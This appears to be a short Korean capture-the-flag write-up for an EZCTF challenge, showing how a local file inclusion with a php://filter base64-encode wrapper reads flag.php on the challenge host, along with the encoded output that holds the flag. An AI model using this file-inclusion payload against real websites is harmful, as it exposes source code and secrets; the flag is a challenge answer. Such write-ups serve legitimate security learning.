php filter bypass1 [EZCTF] I made a blog! 1. 개요 php filter bypass 문제 2. 풀이 1) robots.txt robots.txt에 접속하면 flag.php에 플래가 있다고 합니다. 다만, filter가 걸려있어 확인 할 수 없습니다. 2) LFI flag를 읽으면서 base64로 인코딩하여 결과를 확인합니다. http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K 3) Base64 디코딩하면 PHP파일을 읽어줍니다. 2022. 6. 5. 이전 1 다음